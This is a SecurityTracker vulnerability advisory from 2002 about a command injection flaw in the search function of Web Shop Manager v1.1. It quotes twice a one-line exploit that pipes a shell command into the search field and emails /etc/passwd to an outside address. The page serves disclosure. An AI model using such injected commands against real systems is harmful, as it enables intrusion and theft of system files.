Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Commerce)  >   Web Shop Manager Vendors:   Web Drive Limited
Web Shop Manager Input Validation Bug Lets Remote Users Execute Commands on the System
SecurityTracker Alert ID:  1004969
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 6 2002
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1
Description:   An input filtering flaw was reported in Web Drive Limited's Web Shop Manager. A remote user can execute commands on the system.

SecurityBugware reported a remote command execution bug in Web Shop Manager v1.1. The software apparently does not filter certain characters from user-supplied input in the 'search' function. A remote user can supply a pipe character followed by system commands to execute commands on the system.

A demonstration exploit command to mail the password file on a Unix/Linux system to a remote user is provided:

|mail email@address < /etc/passwd

SecurityBugware credits Tacettin Karadeniz [tacettinkaradeniz at] with reporting the flaw.

Impact:   A remote user can execute arbitrary commands on the system with the privileges of the web server CGI process.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.

 Source Message Contents

Subject:  Web Shop Manager

SecurityBugware reported a remote command execution bug in Web Shop
Manager v1.1.

According to the report:

Tacettin Karadeniz [] found that a remote
user can place some commands in the php-webshop-manager product's search
feature to cause the server to send arbitrary files (such as the
password file) to any e-mail address.  A demonstration exploit command
is provided:
   |mail < /etc/passwd
The vendor's URL is:


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, LLC